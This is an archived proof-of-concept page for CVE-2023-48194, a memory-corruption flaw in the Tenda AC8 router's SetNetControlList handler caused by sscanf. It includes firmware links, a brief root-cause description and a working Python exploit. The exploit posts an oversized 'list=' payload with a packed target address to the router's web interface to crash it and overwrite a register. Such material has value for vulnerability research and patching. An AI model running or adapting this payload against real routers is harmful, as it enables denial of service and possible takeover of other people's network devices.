CVE-2023-48194 PoC — Tenda AC8 安全漏洞

Source

https://github.com/zt20xx/CVE-2023-48194

Associated Vulnerability

Title:Tenda AC8 安全漏洞 (CVE-2023-48194)
Description:Tenda AC8是中国腾达（Tenda）公司的一款无线路由器。 Tenda AC8 V16.03.34.09版本存在安全漏洞，该漏洞源于存在sscanf问题，s8的最后一位被x0覆盖。执行set_client_qos后可获得对gp寄存器的控制权。

Readme

# CVE-2023-48194
## Overview

Firmware download website:

https://www.tenda.com.cn/download/detail-3683.html

https://down.tenda.com.cn/uploadfile/AC8/V16.03.34.09.zip

https://static.tenda.com.cn/tdcweb/download/uploadfile/AC8/V16.03.34.09.zip

## Affected version

AC8/V16.03.34.09

## Vulnerability details

Tenda AC8v4 .V16.03.34.09. Due to sscanf, the last digit of s8 is overwritten with \x0. After executing set_client_qos, control over the gp register is obtained

![image-20231110220324578](./assets/image-20231110220324578-1720273401785-36.png)

![image-20231111010734363](./assets/image-20231111010734363-1720273369808-31.png)

![image-20231110211938397](./assets/image-20231110211938397-1720273369809-32.png)

## PoC

a poc to make it `Segmentation fault (core dumped)`

```
import requests
url = 'http://192.168.0.1/goform/SetNetControlList'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close',
    'Content-Length': '3003'
}
payload=b"list="

pad=0x407ff818-0x407ff7c0
from pwn import *
target=0x40302010
target=p32(target)
payload+=b"a"*(pad)+target+b"c"*(0x110-pad)
# list len >=0x100
try:
    requests.post(url, headers=headers, data=payload,timeout=3)
except requests.exceptions.ReadTimeout:
    print("test ok")
```

![image-20240706214512012](./assets/image-20240706214512012.png)

before sscanf

![image-20231110215023268](./assets/image-20231110215023268-1720273237248-10.png)

after,and will ret

![image-20231110215635663](./assets/image-20231110215635663-1720273237247-6.png)

![image-20231110222010134](./assets/image-20231110222010134-1720273237248-8.png)

![image-20231110222523163](./assets/image-20231110222523163-1720273237248-9.png)

File Snapshot


 [4.0K]  /data/pocs/373438c5a3a57227b98ed8ee7893d278f02f1fba
├── [4.0K]  assets
│   ├── [ 51K]  image-20231110211938397-1720273237248-7.png
│   ├── [ 51K]  image-20231110211938397-1720273308784-16.png
│   ├── [ 51K]  image-20231110211938397-1720273369809-32.png
│   ├── [ 51K]  image-20231110211938397.png
│   ├── [ 12K]  image-20231110215023268-1720273237248-10.png
│   ├── [ 12K]  image-20231110215023268.png
│   ├── [ 75K]  image-20231110215635663-1720273237247-6.png
│   ├── [ 75K]  image-20231110215635663.png
│   ├── [ 31K]  image-20231110220324578-1720273401785-36.png
│   ├── [ 31K]  image-20231110220324578.png
│   ├── [128K]  image-20231110222010134-1720273237248-8.png
│   ├── [128K]  image-20231110222010134.png
│   ├── [ 40K]  image-20231110222523163-1720273237248-9.png
│   ├── [ 40K]  image-20231110222523163.png
│   ├── [160K]  image-20231111010501906.png
│   ├── [ 19K]  image-20231111010734363-1720273369808-31.png
│   ├── [ 19K]  image-20231111010734363.png
│   └── [160K]  image-20240706214512012.png
└── [1.8K]  README.md

1 directory, 19 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!